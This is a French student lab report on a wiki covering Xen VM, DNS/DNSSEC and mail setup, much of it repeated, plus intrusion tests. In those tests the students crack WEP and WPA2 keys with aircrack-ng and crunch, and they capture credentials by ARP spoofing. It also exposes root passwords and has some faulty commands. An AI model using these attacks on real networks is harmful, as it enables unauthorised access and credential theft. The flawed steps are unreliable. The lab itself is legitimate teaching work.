On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|200px|thumb|left|texte descriptif]]
 

on constate que on resoit bien les message en provenance du mail de Polytech.

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

Fichier:Reception messages mirage.png

2020-11-20T08:19:58Z

Aglaine :

TP sysres IMA2a5 2020/2021 G5

2020-11-20T08:16:11Z

Aglaine : /* Services Internet */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

